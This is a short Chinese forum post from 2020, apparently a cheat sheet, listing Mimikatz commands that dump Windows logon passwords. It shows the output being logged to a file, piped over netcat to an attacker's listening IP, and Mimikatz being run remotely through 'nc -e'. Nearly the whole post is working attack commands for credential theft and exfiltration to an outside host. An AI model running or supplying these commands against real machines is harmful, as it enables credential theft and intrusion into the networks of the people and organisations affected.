|
|
[md]1.记录 Mimikatz 输出:
C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.将输出导入到本地文件:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.将输出传输到远程机器:
Attacker 执行:
E:\>nc -lvp 4444
Victim 执行:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 为 Attacker IP
4.通过 nc 远程执行 Mimikatz:
Victim 执行:
C:\>nc -lvp 443
Attacker 执行:
E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 为 Victim IP
[/md] |
|
发表于 2020-5-14 13:33:21
